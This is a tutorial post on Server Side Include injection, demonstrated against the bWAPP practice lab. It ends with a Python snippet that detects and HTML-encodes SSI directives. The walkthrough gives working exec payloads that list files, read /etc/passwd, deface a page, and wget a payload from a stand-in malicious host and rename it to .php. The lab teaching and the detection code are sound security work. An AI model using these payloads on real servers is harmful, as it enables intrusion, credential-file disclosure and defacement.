What is Server Side Include?
Before explaining exactly what it is, let me ask you a simple question. Assume that you need to develop an application of 100 pages with dynamic content, and each page must have a header, footer and logo. What would be your answer? How much time would it take to add the header and footer to all the pages?
This is where the feature called Server Side Include (SSI) comes in. It is a time-saving feature used for developing applications with dynamic web content. To answer the question above: to insert a header and footer in all pages throughout the website, we can use the simple command ‘#include’, which inserts one file into another. If we need to change anything in the header, we only need to modify the code in one single file. Web pages that contain SSIs often end with a .shtml extension, which tells the server that those pages need to be processed.
Yes, this looks like a comment in HTML/XML but it’s not! SSI syntax varies from server to server (Linux to Windows). I am sharing a few examples for Linux-based servers.
Real-world examples of SSI would be displaying server-specific information such as the current server time, the visitor’s IP address and the document type:
<!--#config timefmt="%A %d %B, %Y" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="LAST_MODIFIED"-->
Server Side Include Injection
As you already know about HTML injections, let’s now see what SSI injection is and what its impact is. From the introduction above, you know that SSI is a useful, time-saving, reusable component. Yes, I agree with you. But what if your application is in the wrong hands? What could happen? It’s something beyond your imagination. Do you want to know what we could do if the web server permits SSI execution without proper validation?
Now it’s time to launch the bee-box server. Log in to bWAPP and select SSI injection. You should see two input fields: first name and last name.
POST some valid data and notice the behavior. You should see your IP address in the web page as shown below.
How does this application know about your IP address? Okay, let’s check the source code, buddy.
So this code is used to display the IP address of the user. Now let’s try to inject something and see whether we can grab some sensitive data.
Here are a few commands:
<!--#echo var="DATE_LOCAL"-->
<!--#exec cmd="ls -al"-->
<!--#exec cmd="cat /etc/passwd"-->
<!--#echo var="DOCUMENT_URI" -->
<!--#exec cmd="wget http://maliciousSite.com/payload.txt | rename payload.txt payload.php" -->
On injecting one of the above commands, I could see the data in /etc/passwd.
We can also deface the web page with a simple command:
<!--#exec cmd="echo 'You are hacked!' > /var/www/bWAPP/documents/bee_ssii.htm" -->
Now browse to the URL http://yourIPAddress/bWAPP/documents/bee_ssii.htm
You should see the defaced page. This is nothing but website defacement, which ruins your reputation.
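The "proper validation" that is missing in this scenario can be sketched as follows. This is an added example, not code from bWAPP or from the original post: it flags SSI directives in submitted form fields (including URL-encoded ones) and HTML-encodes values before they are written into a page the server parses for SSI. The field names, the sample values and the high/medium split are assumptions made for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# Opening of an SSI directive: "<!--#" followed by the element name.
SSI_OPEN = re.compile(r"<!--#\s*([a-z]+)", re.IGNORECASE)
# Elements that run commands or pull in other files (assumed triage split).
HIGH_RISK = {"exec", "include"}

def decode_layers(value, max_rounds=3):
    """URL-decode repeatedly so single- and double-encoded input is seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi(value):
    """Return the SSI element names found in a submitted value, lower-cased."""
    return [m.group(1).lower() for m in SSI_OPEN.finditer(decode_layers(value))]

def neutralise(value):
    """HTML-encode the value so "<!--#" is stored as inert "&lt;!--#" text."""
    return html.escape(value, quote=True)

def review_form(form):
    """Map each field carrying a directive to (severity, element names)."""
    findings = {}
    for field, value in form.items():
        elements = find_ssi(value)
        if elements:
            severity = "high" if HIGH_RISK & set(elements) else "medium"
            findings[field] = (severity, elements)
    return findings

# Constructed sample submission; the directives are ones quoted in this post,
# the second one double URL-encoded. Field names are hypothetical.
SAMPLE_FORM = {
    "firstname": '<!--#echo var="DATE_LOCAL"-->',
    "lastname": "%253C%2521--%2523exec%20cmd%253D%2522ls%20-al%2522--%253E",
    "comment": "O'Brien <bee>",
}

if __name__ == "__main__":
    print(review_form(SAMPLE_FORM))
```

Encoding on output is the part that stops the injection; the detection step is for logging and alerting. On Apache, serving such pages with `Options IncludesNOEXEC` instead of `Includes` additionally disables the exec element.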
So, this is all about Server Side Include injection. If I missed anything, please feel free to post comments below.